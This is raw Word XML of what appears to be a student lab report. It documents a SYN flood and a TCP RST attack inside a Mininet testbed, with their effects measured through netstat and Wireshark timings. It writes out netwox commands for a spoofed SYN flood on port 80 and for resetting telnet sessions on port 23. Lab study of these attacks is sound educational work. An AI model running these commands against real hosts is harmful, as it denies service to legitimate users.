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AB235" w14:textId="3CAE1AED" w:rsidR="00354F28" w:rsidRPr="00CC0CA3" w:rsidRDefault="008B0F87" w:rsidP="008B0F87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC0CA3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC0CA3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 76 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC0CA3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC0CA3">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.3 -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4BC0A6" w14:textId="7E762265" w:rsidR="000B2E48" w:rsidRDefault="000B2E48" w:rsidP="008B0F87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122FCEBC" w14:textId="77777777" w:rsidR="00E46B2D" w:rsidRDefault="000B2E48" w:rsidP="00E46B2D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649E219B" wp14:editId="217C2C0D">
            <wp:extent cx="458152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BB83" w14:textId="246837F0" w:rsidR="000B2E48" w:rsidRDefault="00E46B2D" w:rsidP="00E46B2D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2612">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Half-open TCP ports from SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FLood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD0348" w14:textId="02F4A63E" w:rsidR="000B2E48" w:rsidRDefault="006C51BA" w:rsidP="006C51BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The attack runs with different source IP addresses</w:t>
      </w:r>
      <w:r w:rsidR="005841CB">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidR="005841CB">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a high volume of SYN </w:t>
      </w:r>
      <w:r w:rsidR="00161CFF">
        <w:t>packets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with spoofed IP addresses</w:t>
      </w:r>
      <w:r w:rsidR="00161CFF">
        <w:t xml:space="preserve"> to launch a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00161CFF">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00161CFF">
        <w:t xml:space="preserve"> attack on </w:t>
      </w:r>
      <w:r w:rsidR="00161CFF" w:rsidRPr="00373B54">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:r w:rsidR="00161CFF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6F6E6" w14:textId="77777777" w:rsidR="00E46B2D" w:rsidRDefault="000B2E48" w:rsidP="00E46B2D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D39A00" wp14:editId="41D3CEDC">
            <wp:extent cx="59436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272"/>
                    <a:stretch/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04E88" w14:textId="23B440AE" w:rsidR="000B2E48" w:rsidRDefault="00E46B2D" w:rsidP="00E46B2D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2612">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attack SYN packets to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="195AB1C5" w14:textId="42738A74" w:rsidR="00DE4528" w:rsidRDefault="000B2E48" w:rsidP="004941EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>No response</w:t>
      </w:r>
      <w:r w:rsidR="00183E5E">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00183E5E" w:rsidRPr="00DE4528">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r w:rsidR="00183E5E">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006C51BA">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C51BA">
        <w:t xml:space="preserve"> attack </w:t>
      </w:r>
      <w:r w:rsidR="00D141FC">
        <w:t xml:space="preserve">and it continuously tries to connect to </w:t>
      </w:r>
      <w:r w:rsidR="00D141FC" w:rsidRPr="00DE4528">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006C51BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE4528">
        <w:t xml:space="preserve">The request from </w:t>
      </w:r>
      <w:r w:rsidR="00DE4528" w:rsidRPr="00233CB8">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r w:rsidR="00DE4528">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE4528" w:rsidRPr="00233CB8">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE4528">
        <w:t xml:space="preserve"> is completed upon termination of the attack, with the response time from the Wireshark trace </w:t>
      </w:r>
      <w:r w:rsidR="004941EC" w:rsidRPr="004941EC">
        <w:t>42.297042</w:t>
      </w:r>
      <w:r w:rsidR="004941EC">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="004941EC" w:rsidRPr="004941EC">
        <w:t>10.811772</w:t>
      </w:r>
      <w:r w:rsidR="004941EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004941EC" w:rsidRPr="004941EC">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="004941EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004941EC" w:rsidRPr="004941EC">
        <w:t>31.4857</w:t>
      </w:r>
      <w:r w:rsidR="004941EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE4528">
        <w:t xml:space="preserve">seconds. Without the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE4528">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE4528">
        <w:t xml:space="preserve"> attack, the response time is 0.0956 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027AF4A4" w14:textId="77777777" w:rsidR="00E46B2D" w:rsidRDefault="00DE4528" w:rsidP="00E46B2D">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70968F53" wp14:editId="16757D7E">
            <wp:extent cx="5943600" cy="11163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E1D4" w14:textId="0AD9FFE6" w:rsidR="00DE4528" w:rsidRDefault="00E46B2D" w:rsidP="00031E1C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2612">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP Connection with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB33AE0" w14:textId="501250A7" w:rsidR="00031E1C" w:rsidRDefault="004941EC" w:rsidP="00031E1C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69ACEB1C" wp14:editId="1F4C6444">
            <wp:extent cx="5943600" cy="1722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76DD" w14:textId="227CDBB2" w:rsidR="00031E1C" w:rsidRPr="00031E1C" w:rsidRDefault="00031E1C" w:rsidP="00031E1C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2612">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP Connection with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45337ACE" w14:textId="77777777" w:rsidR="00E46B2D" w:rsidRDefault="0010533B" w:rsidP="00E46B2D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42560BC1" wp14:editId="7A0DB2BE">
            <wp:extent cx="361950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0348" w14:textId="3657A572" w:rsidR="000B2E48" w:rsidRDefault="00E46B2D" w:rsidP="00E46B2D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BD2612">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00D40B59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00135802">
        <w:t>leg fails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to connect</w:t>
      </w:r>
      <w:r w:rsidR="00135802">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00135802">
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> during </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F891AE6" w14:textId="1740BE98" w:rsidR="00026F66" w:rsidRDefault="00026F66" w:rsidP="00026F66">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00026F66">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SYN Flooding Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00026F66">
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="29DC7D06" w14:textId="5BD1A110" w:rsidR="00026F66" w:rsidRPr="00026F66" w:rsidRDefault="00700984" w:rsidP="00026F66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The successful execution of the flooding attack is observed by a series of half-open TCP SYN connections being displayed when </w:t>
      </w:r>
      <w:r w:rsidRPr="003E43B1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E43B1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>na</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is executed. Furthermore, a connection request from </w:t>
      </w:r>
      <w:r w:rsidRPr="003E43B1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E43B1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is not answered as seen by the repeated time outs.</w:t>
      </w:r>
      <w:r w:rsidR="00915F7A">
        <w:t xml:space="preserve"> This connection is finally established when the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00915F7A">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00915F7A">
        <w:t xml:space="preserve"> attack is ended, and the total time to connect is significantly higher than usual (31 versus 0.09 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A72040" w14:textId="77777777" w:rsidR="00EB5237" w:rsidRDefault="00EB5237" w:rsidP="00377B55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E5CB572" w14:textId="3AD8C47B" w:rsidR="007D5F0C" w:rsidRDefault="007D5F0C" w:rsidP="00EB5237">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Telnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA2E2D" w14:textId="37FF75F3" w:rsidR="00377B55" w:rsidRDefault="007D5F0C" w:rsidP="00614AB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminal, establish a telnet connection to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7386B900" w14:textId="56EC8826" w:rsidR="007D5F0C" w:rsidRPr="00C861E1" w:rsidRDefault="007D5F0C" w:rsidP="00614AB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet 10.0.0.3 -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>mininet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C565313" w14:textId="77777777" w:rsidR="003B63ED" w:rsidRDefault="008D2193" w:rsidP="003B63ED">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3793D761" wp14:editId="3DBA8486">
            <wp:extent cx="4181475" cy="147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07A6" w14:textId="059F31CC" w:rsidR="008D2193" w:rsidRDefault="003B63ED" w:rsidP="003B63ED">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Telnet connection in leg terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D7527" w14:textId="5DB65AB8" w:rsidR="007D5F0C" w:rsidRDefault="007D5F0C" w:rsidP="00614AB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">terminal, run an RST attack on port 23 of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>vic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2626F" w14:textId="74ACA422" w:rsidR="007D5F0C" w:rsidRPr="00C861E1" w:rsidRDefault="007D5F0C" w:rsidP="00614AB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> 78 --device “att-eth0” --filter “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> host 10.0.0.3 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C861E1">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 23”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895D92A" w14:textId="77777777" w:rsidR="000101C5" w:rsidRDefault="008D2193" w:rsidP="000101C5">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45F04884" wp14:editId="2E1AD3E9">
            <wp:extent cx="4581525" cy="54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9B9F" w14:textId="4E1FE149" w:rsidR="008D2193" w:rsidRDefault="000101C5" w:rsidP="000101C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 78 attack in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012484">
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00447DE8">
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05628F37" w14:textId="3E8E0996" w:rsidR="008D2193" w:rsidRDefault="008D2193" w:rsidP="00614AB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The telnet connection in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8287D">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Mono" w:hAnsi="IBM Plex Mono"/>
        </w:rPr>
        <w:t>leg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is terminated and future connections cannot be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27323100" w14:textId="77777777" w:rsidR="00447DE8" w:rsidRDefault="008D2193" w:rsidP="00447DE8">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="490E937D" wp14:editId="4F3D0624">
            <wp:extent cx="36195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8459" w14:textId="70864A2A" w:rsidR="008D2193" w:rsidRDefault="00447DE8" w:rsidP="00447DE8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00BD2612">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> Telnet connection in leg terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C94E39B" w14:textId="5EE24359" w:rsidR="008D2193" w:rsidRDefault="008D2193" w:rsidP="007D5F0C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77946822" w14:textId="35C27AE0" w:rsidR="007D5F0C" w:rsidRDefault="007D5F0C" w:rsidP="00EB5237">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
